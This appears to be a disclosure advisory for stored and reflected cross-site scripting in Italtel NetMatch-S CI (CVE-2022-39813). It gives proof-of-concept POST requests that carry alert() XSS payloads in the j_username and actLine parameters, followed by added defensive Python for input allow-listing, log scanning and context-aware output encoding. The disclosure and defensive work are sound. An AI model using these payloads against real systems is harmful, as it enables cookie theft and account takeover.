Vulnerability Description: Multiple Cross-Site Scripting (Reflected/Stored) - CWE-79
Software Version: 5.2.0-20211008
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39813
CVSSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
Italtel NetMatch-S CI 5.2.0-20211008 allows Multiple Reflected/Stored XSS issues under NMSCIWebGui/j_security_check via the j_username parameter, or NMSCIWebGui/actloglineview.jsp via the name or actLine parameter. An attacker leveraging this vulnerability could inject arbitrary JavaScript. The payload would then be triggered every time an authenticated user browses the page containing it.
Step-by-step instructions and PoC.
The web application does not properly validate the parameters sent by clients before re-including them in the HTTP pages it returns. In particular, the web GUI is affected by both the stored and the reflected variant of this vulnerability. Because user input is not validated, an attacker can inject HTML into the response and alter the expected execution flow. The attack can be performed both before and after authentication.
Affected Endpoints
- URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_check
  HTTP POST parameter: j_username
- URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
  HTTP POST parameters: name, actLine
Below is the evidence, with the vulnerability details and the payloads used.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_check
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/j_security_check HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=test.csv;%3Cimg+src
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
j_username=<img+src=x+onerror=alert(document.cookie)+>&j_password=%27
The endpoint is affected by the stored type of this vulnerability. The first step consists of replacing the value of the "j_username" POST parameter with the JavaScript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since alerts of this kind generate a notification on the home page, the JavaScript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical, since the attacker does not need any kind of access to the web application in order to exploit it.
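The following Python script is an added example, not the vendor's code and not part of the original advisory. Since the stored variant relies on the failed j_username value being written to the application log and then rendered on the home page, it shows two defensive measures that do not depend on the GUI's rendering code: an allow-list check on the login name, applied before the value reaches the log, and a scan of authentication-failure log entries for markup in the username field to find earlier injection attempts. The log layout, timestamps, source addresses, regular expressions and the Finding type are constructed assumptions; the real NetMatch-S CI log format is not given on the page. The only payload string is the one from the advisory's own PoC request.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of authentication-failure entries in a made-up layout (the real
# NetMatch-S CI log format is not on the page). The third entry carries the j_username
# value from the advisory's PoC request.
SAMPLE_AUTH_LOG = """\
2022-09-01T10:12:03Z AUTH_FAILURE src=10.0.0.5 user="operator1"
2022-09-01T10:12:41Z AUTH_FAILURE src=10.0.0.5 user="o'brien"
2022-09-01T10:13:07Z AUTH_FAILURE src=198.51.100.7 user="<img src=x onerror=alert(document.cookie) >"
2022-09-01T10:14:00Z AUTH_SUCCESS src=10.0.0.6 user="operator1"
"""

# Input-side mitigation: an allow-list for login names. Anything outside it is rejected
# before it can reach the log or the GUI; the length limit and character set are assumptions.
USERNAME_RE = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def is_valid_username(value: str) -> bool:
    """True if the login name consists only of allow-listed characters."""
    return USERNAME_RE.fullmatch(value) is not None


# Triage heuristic for log review: tag openers, inline event handlers, javascript: URLs
# and numeric HTML entities. Deliberately broader than the allow-list above, since it is
# meant to surface entries for a human to look at, not to gate input.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:|&#x?[0-9a-f]+;", re.IGNORECASE)


def looks_like_markup(value: str) -> bool:
    """True if the value contains something an HTML parser could treat as active content."""
    return MARKUP_RE.search(value) is not None


# Parser for the constructed log layout above.
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<event>\S+) src=(?P<src>\S+) user="(?P<user>.*)"$')


@dataclass
class Finding:
    timestamp: str
    source: str
    username: str


def scan_auth_log(text: str) -> List[Finding]:
    """Return every AUTH_FAILURE entry whose username field looks like markup.
    Successful logins are skipped: the advisory ties the stored payload to failed attempts."""
    findings: List[Finding] = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match is None or match.group("event") != "AUTH_FAILURE":
            continue
        user = match.group("user")
        if looks_like_markup(user):
            findings.append(Finding(match.group("ts"), match.group("src"), user))
    return findings


if __name__ == "__main__":
    for finding in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"{finding.timestamp} from {finding.source}: suspicious username {finding.username!r}")
    for name in ("operator1", "o'brien", "<img src=x onerror=alert(document.cookie) >"):
        print(f"{name!r}: allow-list {'pass' if is_valid_username(name) else 'reject'}, "
              f"markup {'yes' if looks_like_markup(name) else 'no'}")
```

Note the difference between the two checks on the constructed "o'brien" entry: the allow-list rejects it (an apostrophe is not in the permitted set), while the log scan does not flag it, because it contains nothing an HTML parser would act on. Rejecting at input and encoding at output are complementary; neither replaces the other.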
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 608
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=today.csv
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
name=today.csv&actLine="</script><img src=x onerror="alert(1)">
The endpoint is affected by the reflected type of this vulnerability. The first step consists of replacing the value of the "actLine" POST parameter with the JavaScript code in order to modify the content of the HTML response page: the content of the parameter is printed without any checks being made. The same behavior is also present for the name parameter. This endpoint is exploitable by any authenticated user who is able to view the application logs.
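The following Python script is an added example (not Italtel's code and not part of the original advisory) that models the root cause described in the step-by-step section and illustrated by both the stored and the reflected case: parameters copied into the response without output encoding. It uses a constructed stand-in for a page that echoes the name and actLine parameters into an HTML element, a JavaScript string literal and a pre block, first without encoding and then with an encoder chosen per output context. The page template, the log-file name and the two checker functions are assumptions; the two payload strings are the ones from the advisory's PoC requests and are used only as test input to show that context-aware encoding neutralises them.

```python
import html
import json

# The two payloads are the ones in the advisory's PoC requests; they are used here only as
# sample input to show what encoding does to them.
STORED_PAYLOAD = "<img src=x onerror=alert(document.cookie) >"
REFLECTED_PAYLOAD = '"</script><img src=x onerror="alert(1)">'


def render_unsafe(name: str, act_line: str) -> str:
    """Constructed stand-in for a JSP that echoes two request parameters as-is into an HTML
    element, a JavaScript string literal and a <pre> block. It models the behaviour the
    advisory describes; it is not Italtel's source."""
    return (
        f"<h2>Log file: {name}</h2>\n"
        f'<script>var line = "{act_line}";</script>\n'
        f"<pre>{act_line}</pre>"
    )


def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal that is safe inside a <script> element.
    json.dumps escapes quotes, backslashes and control characters but leaves '<' and '>'
    alone, so '</script>' in the data would still end the script element for the HTML
    parser. \\u003c and \\u003e are ordinary JavaScript string escapes: the script sees the
    original characters, the HTML parser never sees a tag."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_escaped(name: str, act_line: str) -> str:
    """Hardened rendering: each output context gets the encoder for that context.
    html.escape(quote=True) covers element content and quoted attributes; the JavaScript
    string gets js_string_literal. Encoding is applied at output, not on the stored value."""
    return (
        f"<h2>Log file: {html.escape(name, quote=True)}</h2>\n"
        f"<script>var line = {js_string_literal(act_line)};</script>\n"
        f"<pre>{html.escape(act_line, quote=True)}</pre>"
    )


def breaks_out_of_script(rendered: str) -> bool:
    """The template emits exactly one </script>; any other count means parameter data
    terminated the script element early."""
    return rendered.count("</script>") != 1


def contains_injected_element(rendered: str) -> bool:
    """The template never emits an <img> tag, so its presence means data became markup."""
    return "<img" in rendered.lower()


if __name__ == "__main__":
    for label, payload in (("stored", STORED_PAYLOAD), ("reflected", REFLECTED_PAYLOAD)):
        for mode, render in (("unsafe", render_unsafe), ("escaped", render_escaped)):
            page = render("today.csv", payload)
            print(f"{label}/{mode}: injected element={contains_injected_element(page)}, "
                  f"script breakout={breaks_out_of_script(page)}")
```

The reflected payload from the advisory is the instructive case: a single generic HTML escape would protect the pre block but not the JavaScript string, and JSON encoding alone would protect the string but still let the HTML parser see a closing script tag. Picking the encoder by output context, as render_escaped does, is what a JSP fix for this class of issue needs to do for every place the name and actLine values are printed.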
Security Impact
Successful exploitation of this vulnerability can result in unauthorized access to critical data or complete account takeover.